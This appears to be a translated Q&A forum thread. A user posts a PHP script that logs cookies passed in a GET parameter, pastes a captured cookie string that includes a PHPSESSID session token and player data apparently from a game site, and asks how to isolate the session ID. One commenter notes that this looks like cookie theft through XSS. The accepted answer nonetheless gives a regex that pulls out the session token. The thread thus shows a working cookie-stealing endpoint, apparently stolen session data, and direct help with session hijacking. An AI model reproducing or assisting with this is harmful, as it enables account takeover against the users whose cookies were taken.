+1 vote
by
How to get only PHPSESSID
my code
<?php
$fw = fopen("log.txt", "a");
fwrite($fw, $_GET["cookie"]."\n");
fclose($fw);
?>
What I have now
mail_info_10999781={"count":4,"lastPostId":"442384768","playerId":"1","playerName":"Система","text":"За участие в Ту..","dateAdded":1586381539,"countNew":"4"}; mail_info_4180878=[]; mail_info_2329300=[]; mail_info_10982672=[]; mail_info_10524789={"count":3,"lastPostId":"444114528","playerId":"1","playerName":"Система","text":"За участие в Ту..","dateAdded":1587504640,"countNew":"3"}; mail_info_9061283={"count":3,"lastPostId":"444114548","playerId":"1","playerName":"Система","text":"За участие в Ту..","dateAdded":1587504666,"countNew":"3"}; mail_info_4767868=[]; mail_info_2307930=[]; mail_info_3713915={"count":4,"lastPostId":"444115078","playerId":"1","playerName":"Система","text":"Вы покинули или..","dateAdded":1587505121,"countNew":"4"}; mail_info_11019215=[]; uidc=75e9f7984b904a; mail_info_7521919={"count":3,"lastPostId":"444119300","playerId":"1","playerName":"Система","text":"За участие в Ту..","dateAdded":1587509668,"countNew":"3"}; mail_info_5249555={"count":3,"lastPostId":"444119305","playerId":"1","playerName":"Система","text":"За участие в Ту..","dateAdded":1587509682,"countNew":"3"}; mail_info_9721044={"count":3,"lastPostId":"444119330","playerId":"1","playerName":"Система","text":"За участие в Ту..","dateAdded":1587509739,"countNew":"3"}; mail_info_9200661={"count":1,"lastPostId":"444119783","playerId":"10978816","playerName":"Букая","text":"Перса верните","dateAdded":1587511049,"countNew":"1"}; mail_info_3775637=[]; mail_info_10950336=[]; mail_info_2728587=[]; mail_info_10799719={"count":4,"lastPostId":"444145953","playerId":"1","playerName":"Система","text":"За участие в Ту..","dateAdded":1587543962,"countNew":"4"}; mail_info_3782473={"count":4,"lastPostId":"444146002","playerId":"1","playerName":"Система","text":"Вы покинули или..","dateAdded":1587543991,"countNew":"4"}; mail_info_8929282={"count":5,"lastPostId":"444146020","playerId":"1","playerName":"Система","text":"Вы покинули или..","dateAdded":1587544010,"countNew":"5"}; mail_info_6872423={"count":4,"lastPostId":"444146071","playerId":"1","playerName":"Система","text":"Вы покинули или..","dateAdded":1587544041,"countNew":"4"}; mail_info_10947584=[]; mail_info_5361529=[]; mail_info_11024570=[]; mail_info_10824306={"count":3,"lastPostId":"444149063","playerId":"1","playerName":"Система","text":"Вы покинули или..","dateAdded":1587546093,"countNew":"3"}; mail_info_9126714=[]; mail_info_9412550=[]; mail_info_8087106=[]; PHPSESSID=720e9a61f3ce5acf34e005ba0811a4e0.1587566959.5217338; mail_info_10209738=[]; lastSyncDate=1587568026488mrush.mobi
Only 720e9a961f3ce5acf34e005ba0811a4e0.1587566959.5217338
by
print $_GET["cookie"] and see what key stores the desired information
by
FanatPHP , a novice hacker found XSS somewhere and collects cookies on his server.
by
Maxim Fedorov I have printed it out above
These cookies are coming to me and I only need PHPSESSID
mail_info_10999781={"count":4,"lastPostId":"442384768","playerId":"1","playerName":"Система","text":"За участие в Ту..","dateAdded":1586381539,"countNew":"4"}; mail_info_4180878=[]; mail_info_2329300=[]; mail_info_10982672=[]; mail_info_10524789={"count":3,"lastPostId":"444114528","playerId":"1","playerName":"Система","text":"За участие в Ту..","dateAdded":1587504640,"countNew":"3"}; mail_info_9061283={"count":3,"lastPostId":"444114548","playerId":"1","playerName":"Система","text":"За участие в Ту..","dateAdded":1587504666,"countNew":"3"}; mail_info_4767868=[]; mail_info_2307930=[]; mail_info_3713915={"count":4,"lastPostId":"444115078","playerId":"1","playerName":"Система","text":"Вы покинули или..","dateAdded":1587505121,"countNew":"4"}; mail_info_11019215=[]; uidc=75e9f7984b904a; mail_info_7521919={"count":3,"lastPostId":"444119300","playerId":"1","playerName":"Система","text":"За участие в Ту..","dateAdded":1587509668,"countNew":"3"}; mail_info_5249555={"count":3,"lastPostId":"444119305","playerId":"1","playerName":"Система","text":"За участие в Ту..","dateAdded":1587509682,"countNew":"3"}; mail_info_9721044={"count":3,"lastPostId":"444119330","playerId":"1","playerName":"Система","text":"За участие в Ту..","dateAdded":1587509739,"countNew":"3"}; mail_info_9200661={"count":1,"lastPostId":"444119783","playerId":"10978816","playerName":"Букая","text":"Перса верните","dateAdded":1587511049,"countNew":"1"}; mail_info_3775637=[]; mail_info_10950336=[]; mail_info_2728587=[]; mail_info_10799719={"count":4,"lastPostId":"444145953","playerId":"1","playerName":"Система","text":"За участие в Ту..","dateAdded":1587543962,"countNew":"4"}; mail_info_3782473={"count":4,"lastPostId":"444146002","playerId":"1","playerName":"Система","text":"Вы покинули или..","dateAdded":1587543991,"countNew":"4"}; mail_info_8929282={"count":5,"lastPostId":"444146020","playerId":"1","playerName":"Система","text":"Вы покинули или..","dateAdded":1587544010,"countNew":"5"}; mail_info_6872423={"count":4,"lastPostId":"444146071","playerId":"1","playerName":"Система","text":"Вы покинули или..","dateAdded":1587544041,"countNew":"4"}; mail_info_10947584=[]; mail_info_5361529=[]; mail_info_11024570=[]; mail_info_10824306={"count":3,"lastPostId":"444149063","playerId":"1","playerName":"Система","text":"Вы покинули или..","dateAdded":1587546093,"countNew":"3"}; mail_info_9126714=[]; mail_info_9412550=[]; mail_info_8087106=[]; PHPSESSID=720e9a61f3ce5acf34e005ba0811a4e0.1587566959.5217338; mail_info_10209738=[]; lastSyncDate=1587568026488mrush.mobi
by
there is no way to get it.

Why is this sausage sent via GET and not post?

1 Answer

0 votes
by
 
Best answer
$str = 'mail_info_10999781={"count":4,"lastPostId":"442384768","playerId":"1","playerName":"Система","text":"За участие в Ту..","dateAdded":1586381539,"countNew":"4"}; mail_info_4180878=[]; mail_info_2329300=[]; mail_info_10982672=[]; mail_info_10524789={"count":3,"lastPostId":"444114528","playerId":"1","playerName":"Система","text":"За участие в Ту..","dateAdded":1587504640,"countNew":"3"}; mail_info_9061283={"count":3,"lastPostId":"444114548","playerId":"1","playerName":"Система","text":"За участие в Ту..","dateAdded":1587504666,"countNew":"3"}; mail_info_4767868=[]; mail_info_2307930=[]; mail_info_3713915={"count":4,"lastPostId":"444115078","playerId":"1","playerName":"Система","text":"Вы покинули или..","dateAdded":1587505121,"countNew":"4"}; mail_info_11019215=[]; uidc=75e9f7984b904a; mail_info_7521919={"count":3,"lastPostId":"444119300","playerId":"1","playerName":"Система","text":"За участие в Ту..","dateAdded":1587509668,"countNew":"3"}; mail_info_5249555={"count":3,"lastPostId":"444119305","playerId":"1","playerName":"Система","text":"За участие в Ту..","dateAdded":1587509682,"countNew":"3"}; mail_info_9721044={"count":3,"lastPostId":"444119330","playerId":"1","playerName":"Система","text":"За участие в Ту..","dateAdded":1587509739,"countNew":"3"}; mail_info_9200661={"count":1,"lastPostId":"444119783","playerId":"10978816","playerName":"Букая","text":"Перса верните","dateAdded":1587511049,"countNew":"1"}; mail_info_3775637=[]; mail_info_10950336=[]; mail_info_2728587=[]; mail_info_10799719={"count":4,"lastPostId":"444145953","playerId":"1","playerName":"Система","text":"За участие в Ту..","dateAdded":1587543962,"countNew":"4"}; mail_info_3782473={"count":4,"lastPostId":"444146002","playerId":"1","playerName":"Система","text":"Вы покинули или..","dateAdded":1587543991,"countNew":"4"}; mail_info_8929282={"count":5,"lastPostId":"444146020","playerId":"1","playerName":"Система","text":"Вы покинули или..","dateAdded":1587544010,"countNew":"5"}; mail_info_6872423={"count":4,"lastPostId":"444146071","playerId":"1","playerName":"Система","text":"Вы покинули или..","dateAdded":1587544041,"countNew":"4"}; mail_info_10947584=[]; mail_info_5361529=[]; mail_info_11024570=[]; mail_info_10824306={"count":3,"lastPostId":"444149063","playerId":"1","playerName":"Система","text":"Вы покинули или..","dateAdded":1587546093,"countNew":"3"}; mail_info_9126714=[]; mail_info_9412550=[]; mail_info_8087106=[]; PHPSESSID=720e9a61f3ce5acf34e005ba0811a4e0.1587566959.5217338; mail_info_10209738=[]; lastSyncDate=1587568026488mrush.mobi';
if(preg_match('/PHPSESSID=(.+?);/', $str, $matches)){
echo $matches[1];
}else{
echo 'Oops';
}
...